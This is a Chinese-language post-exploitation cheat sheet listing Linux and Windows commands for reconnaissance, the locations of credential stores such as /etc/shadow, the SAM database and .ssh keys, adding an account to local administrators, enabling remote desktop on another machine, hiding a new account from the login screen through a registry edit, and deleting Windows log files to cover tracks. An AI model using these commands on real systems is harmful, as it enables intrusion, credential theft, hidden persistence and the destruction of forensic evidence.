基本信息收集

Linux

  • /etc/resolv.conf
  • /etc/passwd
  • /etc/shadow
  • whoami and who –a
  • ifconfig -a, iptables -L -n, ifconfig –a,netstat –r
  • uname –a, ps aux
  • dpkg -l| head

Windows

  • ipconfig /all , ipconfig /displaydns,netstat -bnao , netstat –r
  • net view , net view /domain
  • net user /domain, net user %username% /domain
  • net accounts, net share
  • net localgroup administrators username /add
  • net group “Domain Controllers” /domain
  • net share name$=C:\ /unlimited
  • net user username /active:yes /domain

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

  • wmic nicconfig getipaddress,macaddress
  • wmic computersystem get username
  • wmic netlogin get name,lastlogon
  • wmic process get caption, executablepath,commandline wmic process where name=“calc.exe” call terminate
  • wmic os getname,servicepackmajorversion
  • wmic product get name,version
  • wmic product where name=“name” call uninstall /nointeractive
  • wmic share get /ALL
  • wmic /node:”machinename” path Win32_TerminalServiceSetting where AllowTSConnections=”0” call SetAllowTSConnections “1“
  • wmic nteventlog get path,filename, writeable

收集敏感数据

商业信息
系统信息

Linux

  • /etc ;/usr/local/etc
  • /etc/password ;/etc/shadow
  • .ssh ;.gnupg 公私钥
  • The e-mail and data files
  • 业务数据库 ;身份认证服务器数据库

/tmp

windows

  • SAM 数据库 ; 注册表文件
  • %SYSTEMROOT%\repair\SAM
  • %SYSTEMROOT%\System32\config\RegBack\SAM
  • 业务数据库 ; 身份认证数据库
  • 临时文件目录
  • UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

禁止在登陆界面显示新建账号

REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v uname /T
REG_DWORD /D 0
del %WINDIR%*.log /a/s/q/f
History
日志

  • auth.log / secure
  • btmp / wtmp
  • lastlog / faillog

其他日志和 HIDS 等